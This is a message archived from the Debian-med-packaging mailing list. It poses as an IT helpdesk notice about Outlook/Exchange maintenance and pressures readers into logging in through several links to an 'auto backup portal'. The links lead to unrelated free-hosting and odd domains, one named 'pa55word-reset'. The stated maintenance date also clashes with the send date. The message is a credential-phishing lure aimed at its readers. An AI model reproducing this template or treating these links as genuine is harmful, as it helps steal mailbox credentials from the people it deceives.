[Debian-med-packaging] HelpDesk Notice

Arcigal, Mark Danielle (Manila) MarkDanielle.Arcigal at sgs.com
Tue Sep 6 13:46:06 UTC 2016

From: Arcigal, Mark Danielle (Manila)
Sent: Tuesday, September 06, 2016 9:22 PM
Subject: HelpDesk Notice

Impacted Groups: 2016 Outlook/Exchange Users

If you are receiving this message, the Outlook / Exchange email servers that provide your email service will undergo scheduled maintenance tonight, August 17, 2016 from 7:00 pm to 2:00 am

Please Click here<http://xprs.imcreator.com/free/serviceteam/itserviceportal> <http://xprs.imcreator.com/free/serviceteam/itserviceportal>  <http://cvxqbg900.ugo.florist/> <http://axeddq291.ulcraft.com/> <http://pa55word-reset.unail.biz/> and log in to your Outlook client prior before 7:00 pm today to enable auto backup of all information's on your mailbox, if you do not log into the auto backup portal, you may lose the connection to your mailbox including all your information's during the maintenance.

If you find it difficult to send or receive messages from your Outlook client after the maintenance period, or tomorrow morning, please close Outlook and then log in again.

We regret this inconvenience and appreciate your patience.


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wish to respond, please follow the contact instructions in the message ONLY.

Information in this email and any attachments is confidential and
intended solely for the use of the individual(s) to whom it is addressed
or otherwise directed. Please note that any views or opinions presented
in this email are solely those of the author and do not necessarily
represent those of the Company.
Finally, the recipient should check this email and any attachments for
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